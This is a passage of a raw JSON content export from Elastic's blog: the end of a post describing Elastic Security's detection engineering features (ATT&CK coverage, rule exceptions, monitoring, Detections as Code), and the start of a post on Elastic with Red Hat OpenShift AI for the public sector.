50%"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs8854d06445a84f35"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eKnowing now what detections Elastic Security provides out of the box and threat detection capabilities you can use to create custom detections, you also need to plan your detection coverage and focus efforts on threats that matter to your organization.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Explore and analyze detection coverage through MITRE ATT\u0026CK","_metadata":{"uid":"cscaa3ca5fa8191219"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eGet a high-level overview of your detections using the MITRE ATT\u0026amp;CK \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/rules-coverage.html\"\u003e\u003cspan style='font-size: 12pt;'\u003ecoverage page\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. You can filter on Elastic or custom rules — enabled or disabled — and see if there are opportunities to improve your coverage. For example, if you have detections focused on later attack stages, consider adding more early-stage detections.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cse80b705d2ee29b43"}}},{"image":{"image":{"uid":"blt05258e254054ffb1","_version":1,"title":"17.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-10-25T17:56:14.515Z","updated_at":"2024-10-25T17:56:14.515Z","content_type":"image/png","file_size":"1133365","filename":"17.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-12T16:54:06.361Z","user":"blt3e52848e0cb3c394","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt05258e254054ffb1/671bdbbe7e3deb0d504d169f/17.png"},"_metadata":{"uid":"cs80126435204d223a"},"caption_l10n":"Figure 17. MITRE ATT\u0026CK coverage overview","alt_text_l10n":"Figure 17. MITRE ATT\u0026CK coverage overview","disable_lightbox":false,"remove_shadow":true,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs879b055118437e8c"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eYou can quickly enable all rules for a specific technique that you've installed but not yet activated right from the technique cell you are looking into.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs8f29815744d6b0dc"}}},{"image":{"image":{"uid":"blt0487f9bac876c570","_version":1,"title":"18.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-10-25T17:56:22.127Z","updated_at":"2024-10-25T17:56:22.127Z","content_type":"image/png","file_size":"115661","filename":"18.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-12T16:54:05.961Z","user":"blt3e52848e0cb3c394","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt0487f9bac876c570/671bdbc6062510ec40431553/18.png"},"_metadata":{"uid":"cs8a05b4ff925f0d1c"},"caption_l10n":"Figure 18. Enable rules for a chosen technique from the coverage page","alt_text_l10n":"Figure 18. Enable rules for a chosen technique from the coverage page","disable_lightbox":false,"remove_shadow":true,"sizing":{"sizing_options":"width-large: 75%"}}},{"title_text":{"title_text":[{"title_l10n":"Tuning rules in Elastic Security","_metadata":{"uid":"cs4d55c5f884f4cd62"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAs part of standard practices, detection engineering teams should regularly review particularly noisy rules or rules that are unusually quiet.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThere are a few ways of \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/add-exceptions.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eaddressing false positives\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, including using single rule exceptions, shared exception lists that apply to multiple rules, and \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/value-lists-exceptions.html\"\u003e\u003cspan style='font-size: 12pt;'\u003evalue lists\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e with exceptions.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eValue lists and their values can be viewed and managed in Elastic Security. These are useful if you need to scale exceptions management or collect indicators of compromise to use in the indicator match rule.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs58c435f4183d8f92"}}},{"image":{"image":{"uid":"bltcd4a12ce9eb5538c","_version":1,"title":"19.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-10-25T17:56:31.515Z","updated_at":"2024-10-25T17:56:31.515Z","content_type":"image/png","file_size":"120323","filename":"19.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-12T16:54:06.063Z","user":"blt3e52848e0cb3c394","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltcd4a12ce9eb5538c/671bdbcf8f426c4bcfdc309e/19.png"},"_metadata":{"uid":"csaf04312e29e56ee9"},"caption_l10n":"Figure 19. Managing value list items","alt_text_l10n":"Figure 19. Managing value list items","disable_lightbox":false,"remove_shadow":true,"sizing":{"sizing_options":null}}},{"callout":{"title_l10n":"","_metadata":{"uid":"cs286fbb2381a333fa"},"paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eTip!\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e You can prevent future false positives with simplified exceptions creation by implementing \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/rules-ui-create.html#rule-ui-advanced-params\"\u003e\u003cspan style='font-size: 12pt;'\u003ecustom highlighted fields\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, as the exception fields will be prefilled for your convenience.\u003c/span\u003e\u003c/p\u003e","callout_reference":[],"callout_type":"Information (info)"}},{"image":{"image":{"uid":"blt43c1939c0a82a5b8","_version":1,"title":"20.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-10-25T17:56:37.685Z","updated_at":"2024-10-25T17:56:37.685Z","content_type":"image/png","file_size":"95994","filename":"20.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-12T16:54:06.150Z","user":"blt3e52848e0cb3c394","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt43c1939c0a82a5b8/671bdbd5ec690330db80b22c/20.png"},"_metadata":{"uid":"cs302c8db12c98a4c8"},"caption_l10n":"Figure 20. Adding a rule exception with prefilled values","alt_text_l10n":"Figure 20. Adding a rule exception with prefilled values","disable_lightbox":false,"remove_shadow":true,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"Rule monitoring and fixing issues","_metadata":{"uid":"csed80d7b0cbf9d3a9"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eGet an overview of how the detection rules are performing in your environment using the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/rule-monitoring-dashboard.html\"\u003e\u003cspan style='font-size: 12pt;'\u003edetection rule monitoring dashboard\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e available in the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eDashboards\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e tab of Elastic Security.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThis dashboard provides visualizations of rule execution statuses and time taken for rule execution. It also helps identify rule candidates for performance and query optimizations.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csabc7341a5c556d13"}}},{"image":{"image":{"uid":"blt74fdda6356af7463","_version":1,"title":"21.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-10-25T17:56:46.309Z","updated_at":"2024-10-25T17:56:46.309Z","content_type":"image/png","file_size":"142410","filename":"21.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-12T16:54:06.257Z","user":"blt3e52848e0cb3c394","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt74fdda6356af7463/671bdbde06251050df431558/21.png"},"_metadata":{"uid":"cs81003d5954400d48"},"caption_l10n":"Figure 21. Rules monitoring dashboard","alt_text_l10n":"Figure 21. Rules monitoring dashboard","disable_lightbox":false,"remove_shadow":true,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csccd6725a76f1397d"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eMore information for \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html\"\u003e\u003cspan style='font-size: 12pt;'\u003emonitoring and troubleshooting\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e can be found in the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eRule monitoring\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e tab or in the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eRule executions\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e table of individual rules.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWith 8.16, if you need to test rules over the past data or backfill missing alerts, you can do it with \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/rules-ui-management.html#manually-run-rules\"\u003e\u003cspan style='font-size: 12pt;'\u003emanual rule run\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. Manual run rule executions will happen with a lower priority when the system is not busy with scheduled rule runs. Once executed, the alerts will show up on the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eAlerts\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e page, and if needed, you can filter for alerts from manual runs only.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs9e0ebe12febf7cc7"}}},{"image":{"image":{"uid":"blt069f3e22305404d3","_version":1,"title":"22.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-10-25T17:56:53.842Z","updated_at":"2024-10-25T17:56:53.842Z","content_type":"image/png","file_size":"151089","filename":"22.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-12T16:54:06.374Z","user":"blt3e52848e0cb3c394","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt069f3e22305404d3/671bdbe5dba3ee9f329bd713/22.png"},"_metadata":{"uid":"cs15ef112a3247d78a"},"caption_l10n":"Figure 22. Configuring manual run for a detection rule","alt_text_l10n":"Figure 22. Configuring manual run for a detection rule","disable_lightbox":false,"remove_shadow":true,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs56cd44fefb1e1dc2"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOnce the rules' performance monitoring is in place, detection teams should look to improve the quality of detection rules with rule reviews and automated testing and deployment. This is where Detection as Code concepts can be helpful.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Improving detection process maturity with Detections as Code","_metadata":{"uid":"csbc10a26a44febd63"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIf you want to level up your detection processes, you may consider doing peer review and versioning your rules using an external version control system as well as automating rule deployment across your systems with a \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/detections-as-code-elastic-security\"\u003e\u003cspan style='font-size: 12pt;'\u003eDetections as Code\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e (DaC) approach.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe are working on opening and supporting \u003c/span\u003e\u003ca href=\"https://www.elastic.co/security-labs/dac-beta-release\"\u003e\u003cspan style='font-size: 12pt;'\u003eDaC tooling\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e within the detection rules repo, enabling you to import and export custom rules easily to and from Elastic Security as well as configure unit tests, validation, and schemas. This is especially useful if you need to scale rule deployments to multiple Elastic Security instances or follow a rigorous change review process.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic’s DaC approach is very flexible and can accommodate different architectures. \u003c/span\u003e\u003ca href=\"https://dac-reference.readthedocs.io/en/latest/dac_concept_and_workflows.html\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eExtensive documentation\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e with examples that highlight the pros and cons of different approaches is available for your convenience. You can also watch the \u003c/span\u003e\u003ca href=\"https://dac-reference.readthedocs.io/en/latest/etoe_reference_example.html#demo-video\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eElastic DaC demo video\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e to get a quick overview.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Wrapping up and putting this knowledge into practice","_metadata":{"uid":"cs614892635cccef05"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eWith all the information you’ve read, we hope we have shown how Elastic Security can help you:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eAddress your security use cases \u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003ewith flexible detection workflows\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eDetect threats\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e with the Elastic \u003c/span\u003e\u003ca href=\"https://www.elastic.co/enterprise-search\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eSearch AI Platform\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e across data sources, locations, and tiers\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eExtend your security team \u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003ewith Elastic’s in-house threat researchers and detection engineers by using a broad selection of \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eout-of-the-box\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e ML models alongside correlation rules that cover cloud, endpoint, network, and SaaS applications, all maintained by \u003c/span\u003e\u003ca href=\"https://www.elastic.co/security-labs\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic Security Labs\u003c/span\u003e\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eAutomatically implement regular content updates\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e from Elastic Security\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eAddress your unique detections needs\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e with custom rule creation and tuning capabilities, ES|QL, and multiple correlation rule types\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eFocus and prioritize\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e detection engineering work with MITRE ATT\u0026amp;CK coverage overview\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eGain deep visibility\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e into detection performance with the rule monitoring dashboard\u0026nbsp;\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eReduce MTTR\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e by automating responses to detections and customizing security analyst triage and the investigation experience\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eScale and mature\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e detection engineering practice with \u003c/span\u003e\u003ca href=\"https://www.elastic.co/security-labs/dac-beta-release\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eDetections as Code\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e support\u003c/span\u003e\u003cbr /\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eTry the new detection engineering capabilities on your deployment or \u003c/span\u003e\u003ca href=\"https://www.elastic.co/cloud/cloud-trial-overview/security?plcmt=hero\u0026pg=en-security-page\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003estart your free trial\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eConnect with us on Elastic’s \u003c/span\u003e\u003ca href=\"https://join.slack.com/t/elasticstack/shared_invite/zt-2sgssfr0n-NhTOlSwHbaGH85tYfx6kGg\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003ecommunity slack\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(255, 153, 0);font-size: 12pt;\"\u003e \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003eto give feedback or tell us what detection engineering practice you are building and how we can help! You can also \u003c/span\u003e\u003ca href=\"https://elastic.eu.qualtrics.com/jfe/form/SV_exQvUoHguCio4pE\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003esign up\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e to participate in the user research program.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cse326d9a6d205533a"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs8cce308c31c93ff6"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eIn this blog post, we may have used or referred to third party generative AI tools, which are owned and operated by their respective owners. Elastic does not have any control over the third party tools and we have no responsibility or liability for their content, operation or use, nor for any loss or damage that may arise from your use of such tools. Please exercise caution when using AI tools with personal, sensitive or confidential information. Any data you submit may be used for AI training or other purposes. There is no guarantee that information you provide will be kept secure or confidential. You should familiarize yourself with the privacy practices and terms of use of any generative AI tools prior to use.\u0026nbsp;\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eElastic, Elasticsearch, ESRE, Elasticsearch Relevance Engine and associated marks are trademarks, logos or registered trademarks of Elasticsearch N.V. in the United States and other countries. All other company and product names are trademarks, logos or registered trademarks of their respective owners.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs8e3f91eb5480e1ce"}}}],"publish_date":"2024-11-12","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"Learn about new features and see if you know all the detection tooling Elastic Security has to offer.","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[],"tags_industry":[],"tags_partner":[],"tags_topic":[{"_content_type_uid":"tags_topic","title":"Automated threat protection","label_l10n":"Automated threat protection","keyword":"automated-threat-protection","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt49e356fcb7971aca","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:08:22.822Z","updated_at":"2023-11-06T20:08:22.822Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T05:40:37.794Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","title":"Cybersecurity","label_l10n":"Cybersecurity","keyword":"cybersecurity","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt276db992db94ced9","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:37:07.408Z","updated_at":"2023-11-06T20:37:07.408Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-04T10:22:02.082Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltd6680e0300eee933","ACL":{},"created_at":"2023-11-06T20:37:41.282Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"defense","label_l10n":"Defense","tags":[],"title":"Defense","updated_at":"2023-11-06T20:37:41.282Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:33:19.232Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltc76ab818663a30de","ACL":{},"created_at":"2023-11-06T21:31:31.473Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security-compliance","label_l10n":"Security \u0026 compliance","tags":[],"title":"Security \u0026 compliance","updated_at":"2023-11-06T21:31:31.473Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:28:54.295Z","user":"blt4b2e1169881270a8"}}],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"blt569b48df66a9ba5d","ACL":{},"created_at":"2020-06-17T03:30:49.259Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security","label_l10n":"Security","tags":[],"title":"Security","updated_at":"2020-07-06T22:20:03.211Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:19.430Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid":"blt6f00e40aaa5c6f0e","ACL":{},"created_at":"2020-06-17T03:32:57.128Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"siem","label_l10n":"SIEM","tags":[],"title":"SIEM","updated_at":"2020-07-06T22:20:05.385Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:19.450Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"blt60e90d78dbab6d14","_version":1,"title":"165197 - Elastic Banner_V1.jpg","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-11-04T14:05:17.984Z","updated_at":"2024-11-04T14:05:17.984Z","content_type":"image/jpeg","file_size":"139915","filename":"165197_-_Elastic_Banner_V1.jpg","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-12T16:54:06.078Z","user":"blt3e52848e0cb3c394","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt60e90d78dbab6d14/6728d49d0d8cdc15c3dce327/165197_-_Elastic_Banner_V1.jpg"},"title":"Know your tools: The full range of Elastic Security’s detection engineering capabilities","title_l10n":"Know your tools: The full range of Elastic Security’s detection engineering capabilities","updated_at":"2024-11-14T22:59:16.569Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/elastic-security-detection-engineering","publish_details":{"time":"2024-11-14T22:59:22.600Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"bltdc87ca3722291ba7","_version":6,"locale":"en-us","ACL":{},"abstract_l10n":"The partnership between Elastic as a vector database and Red Hat OpenShift AI offers a compelling solution for public sector organizations looking to implement AI and ML in their environments.","author":["blt68966c85afe4061b"],"category":["bltb79594af7c5b4199"],"created_at":"2024-11-14T18:22:58.935Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs5ee25b41da762dc7"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAs public sector organizations adapt to the exponential growth of data, there is a pressing need for powerful, adaptable solutions to manage and process large, complex data sets. Artificial intelligence (AI) and machine learning (ML) have become essential tools with the potential to transform data into actionable intelligence for government agencies. However, deploying these advanced solutions requires a robust infrastructure capable of handling the demands of data processing, storage, and analysis.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003ePublic sector agencies manage vast amounts of structured and unstructured data, including documents, images, and multimedia. The demand for AI-driven insights from this data requires efficient storage, retrieval, and analysis capabilities. The collaboration between Elastic as a vector database and Red Hat OpenShift AI offers a compelling solution for public sector organizations looking to implement AI and ML in their IT environments. Elastic's high-performance vector search capabilities and Red Hat OpenShift AI’s flexible, containerized architecture provides public sector organizations with a secure, scalable foundation for developing AI and ML applications that can improve situational awareness, automate repetitive tasks, and deliver accurate insights quickly.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eKey benefits:\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eEnhanced data management:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Elastic’s vector database capabilities enable high-speed, high-accuracy searches across unstructured data for complex AI-driven use cases.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eScalable AI infrastructure:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Red Hat OpenShift AI offers a flexible, containerized platform that integrates seamlessly with Elastic, providing agencies with a scalable AI and ML environment.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eSecurity and compliance:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Both Elastic and Red Hat ensure solutions are designed to meet stringent government security standards, making them ideal for public sector applications.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Elastic as a vector database: Foundation for AI-driven data management","_metadata":{"uid":"cs9cfc3b3e7685ad9b"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe Elastic Search AI Platform is built on the latest search technology, including vector storage and search, making it a robust choice for AI data storage and retrieval. Here’s how Elastic meets the evolving data needs of public sector agencies:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eVector-based search and storage:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Elastic supports dense vector representations of data, allowing for rapid similarity searches on unstructured data. This is critical for applications in areas, such as fraud detection, threat intelligence, and case management, where high-speed data retrieval is essential.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eScalable and real-time analytics:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Elastic's distributed architecture provides scalable data storage and analytics, making it ideal for public sector organizations dealing with increasing data volumes. Real-time data ingestion ensures that agencies have up-to-date insights whenever they need them.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eAdvanced security:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 